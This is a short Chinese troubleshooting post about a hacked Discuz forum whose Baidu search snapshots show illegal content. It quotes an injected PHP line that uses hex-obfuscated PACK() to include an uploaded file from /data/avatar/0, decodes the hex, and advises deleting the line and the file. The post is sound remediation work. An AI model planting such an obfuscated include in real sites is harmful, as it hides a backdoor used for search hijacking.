在百度搜索快照中,发现discuz搜索结果出现很多违法信息,
在discuz后台站长工具进行文件检验,在php文件中(尤其注意文件)出现@include($_SERVER['DOCUMENT_ROOT']类似代码
比如:
@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30')
对字符串:2F646174612F6176617461722F30进行解密,
通过16进制文本字符串在线转化,解密后为:/data/avatar/0
意思就是在上述路径下存在被非法上传的文件,用于做快照劫持。
解决办法:删除上面的代码和文件即可。